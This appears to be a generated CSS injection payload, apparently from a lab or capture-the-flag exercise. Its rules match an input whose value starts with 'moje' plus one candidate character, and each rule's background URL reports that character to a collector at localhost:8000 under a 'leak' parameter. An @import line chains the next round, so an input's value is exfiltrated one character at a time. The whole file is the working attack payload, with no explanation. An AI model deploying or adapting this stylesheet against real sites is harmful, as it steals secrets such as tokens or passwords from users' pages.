@import url("http://localhost:8000/?l=6");
input[value="moje!"] {background: url("http://localhost:8000/?leak=!&q=0.638089922956872");}
input[value="moje\""] {background: url("http://localhost:8000/?leak=\"&q=0.7077739756534973");}
input[value="moje#"] {background: url("http://localhost:8000/?leak=#&q=0.5074219030847615");}
input[value="moje$"] {background: url("http://localhost:8000/?leak=$&q=0.6421297964471206");}
input[value="moje%"] {background: url("http://localhost:8000/?leak=%&q=0.6486522565900514");}
input[value="moje&"] {background: url("http://localhost:8000/?leak=&&q=0.7311287290626471");}
input[value="moje'"] {background: url("http://localhost:8000/?leak='&q=0.74805109542074");}
input[value="moje("] {background: url("http://localhost:8000/?leak=(&q=0.7204341633662308");}
input[value="moje)"] {background: url("http://localhost:8000/?leak=)&q=0.6565422931196021");}
input[value="moje*"] {background: url("http://localhost:8000/?leak=*&q=0.3706497623559286");}
input[value="moje+"] {background: url("http://localhost:8000/?leak=+&q=0.8458435087478644");}
input[value="moje,"] {background: url("http://localhost:8000/?leak=,&q=0.6291157803841103");}
input[value="moje-"] {background: url("http://localhost:8000/?leak=-&q=0.9379227568194217");}
input[value="moje."] {background: url("http://localhost:8000/?leak=.&q=0.6940471297920092");}
input[value="moje/"] {background: url("http://localhost:8000/?leak=/&q=0.6534753755017524");}
input[value="moje0"] {background: url("http://localhost:8000/?leak=0&q=0.46659284641290144");}
input[value="moje1"] {background: url("http://localhost:8000/?leak=1&q=0.7896242396193698");}
input[value="moje2"] {background: url("http://localhost:8000/?leak=2&q=0.8066988600694667");}
input[value="moje3"] {background: url("http://localhost:8000/?leak=3&q=0.04708993084544555");}
input[value="moje4"] {background: url("http://localhost:8000/?leak=4&q=0.5940234391722974");}
input[value="moje5"] {background: url("http://localhost:8000/?leak=5&q=0.6807756306842301");}
input[value="moje6"] {background: url("http://localhost:8000/?leak=6&q=0.7729106190397699");}
input[value="moje7"] {background: url("http://localhost:8000/?leak=7&q=0.775129730929198");}
input[value="moje8"] {background: url("http://localhost:8000/?leak=8&q=0.7629542094253774");}
input[value="moje9"] {background: url("http://localhost:8000/?leak=9&q=0.191018631336076");}
input[value="moje:"] {background: url("http://localhost:8000/?leak=:&q=0.48440099505127887");}
input[value="moje;"] {background: url("http://localhost:8000/?leak=;&q=0.43258079087675627");}
input[value="moje<"] {background: url("http://localhost:8000/?leak=<&q=0.49588090035595433");}
input[value="moje="] {background: url("http://localhost:8000/?leak==&q=0.9039962488131665");}
input[value="moje>"] {background: url("http://localhost:8000/?leak=>&q=0.19635566057030407");}
input[value="moje?"] {background: url("http://localhost:8000/?leak=?&q=0.7258652969216093");}
input[value="moje@"] {background: url("http://localhost:8000/?leak=@&q=0.11386388146269621");}
input[value="mojeA"] {background: url("http://localhost:8000/?leak=A&q=0.9752060706308023");}
input[value="mojeB"] {background: url("http://localhost:8000/?leak=B&q=0.26297752814574693");}
input[value="mojeC"] {background: url("http://localhost:8000/?leak=C&q=0.11660774420496245");}
input[value="mojeD"] {background: url("http://localhost:8000/?leak=D&q=0.07498116003621691");}
input[value="mojeE"] {background: url("http://localhost:8000/?leak=E&q=0.7775237632582903");}
input[value="mojeF"] {background: url("http://localhost:8000/?leak=F&q=0.5794834629900147");}
input[value="mojeG"] {background: url("http://localhost:8000/?leak=G&q=0.5602063240344897");}
input[value="mojeH"] {background: url("http://localhost:8000/?leak=H&q=0.8430314472974831");}
input[value="mojeI"] {background: url("http://localhost:8000/?leak=I&q=0.7611579346473281");}
input[value="mojeJ"] {background: url("http://localhost:8000/?leak=J&q=0.6199215425922764");}
input[value="mojeK"] {background: url("http://localhost:8000/?leak=K&q=0.6735885044661551");}
input[value="mojeL"] {background: url("http://localhost:8000/?leak=L&q=0.4811490401436651");}
input[value="mojeM"] {background: url("http://localhost:8000/?leak=M&q=0.39812629448644565");}
input[value="mojeN"] {background: url("http://localhost:8000/?leak=N&q=0.7852988699911643");}
input[value="mojeO"] {background: url("http://localhost:8000/?leak=O&q=0.032851089187853066");}
input[value="mojeP"] {background: url("http://localhost:8000/?leak=P&q=0.1048304102643387");}
input[value="mojeQ"] {background: url("http://localhost:8000/?leak=Q&q=0.5196040194564915");}
input[value="mojeR"] {background: url("http://localhost:8000/?leak=R&q=0.8823297663390477");}
input[value="mojeS"] {background: url("http://localhost:8000/?leak=S&q=0.3238387193539123");}
input[value="mojeT"] {background: url("http://localhost:8000/?leak=T&q=0.5457645855339965");}
input[value="mojeU"] {background: url("http://localhost:8000/?leak=U&q=0.059858485550496");}
input[value="mojeV"] {background: url("http://localhost:8000/?leak=V&q=0.1547219322704918");}
input[value="mojeW"] {background: url("http://localhost:8000/?leak=W&q=0.031041628055441528");}
input[value="mojeX"] {background: url("http://localhost:8000/?leak=X&q=0.006958946332419114");}
input[value="mojeY"] {background: url("http://localhost:8000/?leak=Y&q=0.39418335036679397");}
input[value="mojeZ"] {background: url("http://localhost:8000/?leak=Z&q=0.04967768087302793");}
input[value="moje["] {background: url("http://localhost:8000/?leak=[&q=0.4158577006602049");}
input[value="moje\\"] {background: url("http://localhost:8000/?leak=\\&q=0.3810813427715374");}
input[value="moje]"] {background: url("http://localhost:8000/?leak=]&q=0.259656399188235");}
input[value="moje^"] {background: url("http://localhost:8000/?leak=^&q=0.722657701451769");}
input[value="moje_"] {background: url("http://localhost:8000/?leak=_&q=0.3794218511596763");}
input[value="moje`"] {background: url("http://localhost:8000/?leak=`&q=0.6434110434714686");}
input[value="mojea"] {background: url("http://localhost:8000/?leak=a&q=0.5735556268704329");}
input[value="mojeb"] {background: url("http://localhost:8000/?leak=b&q=0.48551230785708865");}
input[value="mojec"] {background: url("http://localhost:8000/?leak=c&q=0.3365009486935433");}
input[value="mojed"] {background: url("http://localhost:8000/?leak=d&q=0.1541211067393513");}
input[value="mojee"] {background: url("http://localhost:8000/?leak=e&q=0.23301044883621969");}
input[value="mojef"] {background: url("http://localhost:8000/?leak=f&q=0.6146727163891672");}
input[value="mojeg"] {background: url("http://localhost:8000/?leak=g&q=0.8117272311655879");}
input[value="mojeh"] {background: url("http://localhost:8000/?leak=h&q=0.767584163281398");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=i&q=0.11861350220037137");}
input[value="mojej"] {background: url("http://localhost:8000/?leak=j&q=0.3457014581596429");}
input[value="mojek"] {background: url("http://localhost:8000/?leak=k&q=0.9765534123388047");}
input[value="mojel"] {background: url("http://localhost:8000/?leak=l&q=0.5072819078332245");}
input[value="mojem"] {background: url("http://localhost:8000/?leak=m&q=0.17989614101362705");}
input[value="mojen"] {background: url("http://localhost:8000/?leak=n&q=0.31814120307055993");}
input[value="mojeo"] {background: url("http://localhost:8000/?leak=o&q=0.810066243279919");}
input[value="mojep"] {background: url("http://localhost:8000/?leak=p&q=0.9716418421359259");}
input[value="mojeq"] {background: url("http://localhost:8000/?leak=q&q=0.038592234266597636");}
input[value="mojer"] {background: url("http://localhost:8000/?leak=r&q=0.1716729221204889");}
input[value="mojes"] {background: url("http://localhost:8000/?leak=s&q=0.8053474043971061");}
input[value="mojet"] {background: url("http://localhost:8000/?leak=t&q=0.5115342319657707");}
input[value="mojeu"] {background: url("http://localhost:8000/?leak=u&q=0.7895249058747422");}
input[value="mojev"] {background: url("http://localhost:8000/?leak=v&q=0.7137904223811868");}
input[value="mojew"] {background: url("http://localhost:8000/?leak=w&q=0.16450568751976413");}
input[value="mojex"] {background: url("http://localhost:8000/?leak=x&q=0.17384751458874792");}
input[value="mojey"] {background: url("http://localhost:8000/?leak=y&q=0.9211935343705735");}
input[value="mojez"] {background: url("http://localhost:8000/?leak=z&q=0.49260911526910656");}
input[value="moje{"] {background: url("http://localhost:8000/?leak={&q=0.2503710167545745");}
input[value="moje|"] {background: url("http://localhost:8000/?leak=|&q=0.34874765960219767");}
input[value="moje}"] {background: url("http://localhost:8000/?leak=}&q=0.7246808562537326");}
input[value="moje~"] {background: url("http://localhost:8000/?leak=~&q=0.47150168991551666");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.2913245445630923");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.5834711519529752");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.4330418258848272");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.7240688651860214");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.48947009104781536");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.5681352860907269");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.5385182376300766");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8569173867832092");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.839537323891542");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.22283592770944005");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.641261240032557");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.0006706216917407026");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.07359269645848032");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.6012655903401503");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.22666383646053823");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.992238179519193");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.7131276198391676");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.6605332107784563");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8243577306920897");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8185423403487986");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.7429904650971744");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.5114731136525339");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.45693556051638673");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.013743406151237814");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.2856371752558855");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8895784475633488");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8525968480148343");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8141424848534637");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8943306142390623");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.6675772263311122");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.048222689981330724");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.8091339328365554");}
input[value="moje"] {background: url("http://localhost:8000/?leak=&q=0.9153408597555535");}
input[value="moje "] {background: url("http://localhost:8000/?leak= &q=0.1968045014963118");}
input[value="moje¡"] {background: url("http://localhost:8000/?leak=¡&q=0.4430899875252514");}
input[value="moje¢"] {background: url("http://localhost:8000/?leak=¢&q=0.4629319650639596");}
input[value="moje£"] {background: url("http://localhost:8000/?leak=£&q=0.7767151888375647");}
input[value="moje¤"] {background: url("http://localhost:8000/?leak=¤&q=0.9880787949804621");}
input[value="moje¥"] {background: url("http://localhost:8000/?leak=¥&q=0.48869034164589364");}
input[value="moje¦"] {background: url("http://localhost:8000/?leak=¦&q=0.5527663135357439");}
input[value="moje§"] {background: url("http://localhost:8000/?leak=§&q=0.1771831360375935");}
input[value="moje¨"] {background: url("http://localhost:8000/?leak=¨&q=0.6121704569776192");}
input[value="moje©"] {background: url("http://localhost:8000/?leak=©&q=0.8746792442115192");}
input[value="mojeª"] {background: url("http://localhost:8000/?leak=ª&q=0.05371556847972747");}
input[value="moje«"] {background: url("http://localhost:8000/?leak=«&q=0.9220604576084124");}
input[value="moje¬"] {background: url("http://localhost:8000/?leak=¬&q=0.6595511247765351");}
input[value="moje­"] {background: url("http://localhost:8000/?leak=­&q=0.05799684576902364");}
input[value="moje®"] {background: url("http://localhost:8000/?leak=®&q=0.31125070944375355");}
input[value="moje¯"] {background: url("http://localhost:8000/?leak=¯&q=0.7432784493629427");}
input[value="moje°"] {background: url("http://localhost:8000/?leak=°&q=0.38027108707431423");}
input[value="moje±"] {background: url("http://localhost:8000/?leak=±&q=0.13663274011454396");}
input[value="moje²"] {background: url("http://localhost:8000/?leak=²&q=0.658612140350433");}
input[value="moje³"] {background: url("http://localhost:8000/?leak=³&q=0.05581695054345914");}
input[value="moje´"] {background: url("http://localhost:8000/?leak=´&q=0.852891854536906");}
input[value="mojeµ"] {background: url("http://localhost:8000/?leak=µ&q=0.8790580142166142");}
input[value="moje¶"] {background: url("http://localhost:8000/?leak=¶&q=0.18812907973046156");}
input[value="moje·"] {background: url("http://localhost:8000/?leak=·&q=0.6135152368630037");}
input[value="moje¸"] {background: url("http://localhost:8000/?leak=¸&q=0.3296186141069086");}
input[value="moje¹"] {background: url("http://localhost:8000/?leak=¹&q=0.8711574248980707");}
input[value="mojeº"] {background: url("http://localhost:8000/?leak=º&q=0.009908737293505387");}
input[value="moje»"] {background: url("http://localhost:8000/?leak=»&q=0.6679174279606321");}
input[value="moje¼"] {background: url("http://localhost:8000/?leak=¼&q=0.04428963387682483");}
input[value="moje½"] {background: url("http://localhost:8000/?leak=½&q=0.3439485966923592");}
input[value="moje¾"] {background: url("http://localhost:8000/?leak=¾&q=0.39750422253920803");}
input[value="moje¿"] {background: url("http://localhost:8000/?leak=¿&q=0.12108720102740111");}
input[value="mojeÀ"] {background: url("http://localhost:8000/?leak=À&q=0.4708639072632479");}
input[value="mojeÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.48146779746151736");}
input[value="mojeÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.4756300999147647");}
input[value="mojeÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.8815268127360345");}
input[value="mojeÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.544612839185799");}
input[value="mojeÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.4404890261333876");}
input[value="mojeÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.1464042359480211");}
input[value="mojeÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.29920602911768546");}
input[value="mojeÈ"] {background: url("http://localhost:8000/?leak=È&q=0.5822042743706042");}
input[value="mojeÉ"] {background: url("http://localhost:8000/?leak=É&q=0.9868540301029123");}
input[value="mojeÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.8952813745901005");}
input[value="mojeË"] {background: url("http://localhost:8000/?leak=Ë&q=0.8269259952627046");}
input[value="mojeÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.5971474256187361");}
input[value="mojeÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.8368734336780086");}
input[value="mojeÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.024218788278808967");}
input[value="mojeÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.7636882783251637");}
input[value="mojeÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.8742324247950712");}
input[value="mojeÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.5213702407931269");}
input[value="mojeÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.0731148206506087");}
input[value="mojeÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.07625812043506341");}
input[value="mojeÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.7100218155873759");}
input[value="mojeÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.2076130897184978");}
input[value="mojeÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.4804897326694746");}
input[value="moje×"] {background: url("http://localhost:8000/?leak=×&q=0.2502043364162294");}
input[value="mojeØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.1673248561787941");}
input[value="mojeÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.13178720610871975");}
input[value="mojeÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.013909003582865509");}
input[value="mojeÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.7931716342186224");}
input[value="mojeÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.39067770577998107");}
input[value="mojeÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.4499852484842659");}
input[value="mojeÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.5203885381161693");}
input[value="mojeß"] {background: url("http://localhost:8000/?leak=ß&q=0.8600720377152169");}
input[value="mojeà"] {background: url("http://localhost:8000/?leak=à&q=0.5380612651621659");}
input[value="mojeá"] {background: url("http://localhost:8000/?leak=á&q=0.7126309849041785");}
input[value="mojeâ"] {background: url("http://localhost:8000/?leak=â&q=0.8934441480306419");}
input[value="mojeã"] {background: url("http://localhost:8000/?leak=ã&q=0.4844553092909665");}
input[value="mojeä"] {background: url("http://localhost:8000/?leak=ä&q=0.04148275188991413");}
input[value="mojeå"] {background: url("http://localhost:8000/?leak=å&q=0.09989086257924251");}
input[value="mojeæ"] {background: url("http://localhost:8000/?leak=æ&q=0.563329756216548");}
input[value="mojeç"] {background: url("http://localhost:8000/?leak=ç&q=0.14643855940915063");}
input[value="mojeè"] {background: url("http://localhost:8000/?leak=è&q=0.8555333063467672");}
input[value="mojeé"] {background: url("http://localhost:8000/?leak=é&q=0.2579545520565871");}
input[value="mojeê"] {background: url("http://localhost:8000/?leak=ê&q=0.3419922657790748");}
input[value="mojeë"] {background: url("http://localhost:8000/?leak=ë&q=0.1248866346294275");}
input[value="mojeì"] {background: url("http://localhost:8000/?leak=ì&q=0.5307400513169269");}
input[value="mojeí"] {background: url("http://localhost:8000/?leak=í&q=0.6198898221916243");}
input[value="mojeî"] {background: url("http://localhost:8000/?leak=î&q=0.925066819276948");}
input[value="mojeï"] {background: url("http://localhost:8000/?leak=ï&q=0.29757654678736456");}
input[value="mojeð"] {background: url("http://localhost:8000/?leak=ð&q=0.49194170621686095");}
input[value="mojeñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.3004734400813347");}
input[value="mojeò"] {background: url("http://localhost:8000/?leak=ò&q=0.14868737189033676");}
input[value="mojeó"] {background: url("http://localhost:8000/?leak=ó&q=0.4348902897279401");}
input[value="mojeô"] {background: url("http://localhost:8000/?leak=ô&q=0.698295441043264");}
input[value="mojeõ"] {background: url("http://localhost:8000/?leak=õ&q=0.3453947234283188");}
input[value="mojeö"] {background: url("http://localhost:8000/?leak=ö&q=0.3561412978599816");}
input[value="moje÷"] {background: url("http://localhost:8000/?leak=÷&q=0.4086017958458066");}
input[value="mojeø"] {background: url("http://localhost:8000/?leak=ø&q=0.3938868469607726");}
input[value="mojeù"] {background: url("http://localhost:8000/?leak=ù&q=0.8199539025738614");}
input[value="mojeú"] {background: url("http://localhost:8000/?leak=ú&q=0.8708953052946158");}
input[value="mojeû"] {background: url("http://localhost:8000/?leak=û&q=0.7146322211726459");}
input[value="mojeü"] {background: url("http://localhost:8000/?leak=ü&q=0.19655750811009032");}
input[value="mojeý"] {background: url("http://localhost:8000/?leak=ý&q=0.775245641681797");}
input[value="mojeþ"] {background: url("http://localhost:8000/?leak=þ&q=0.47147258187414365");}
input[value="mojeÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.5721249746157562");}
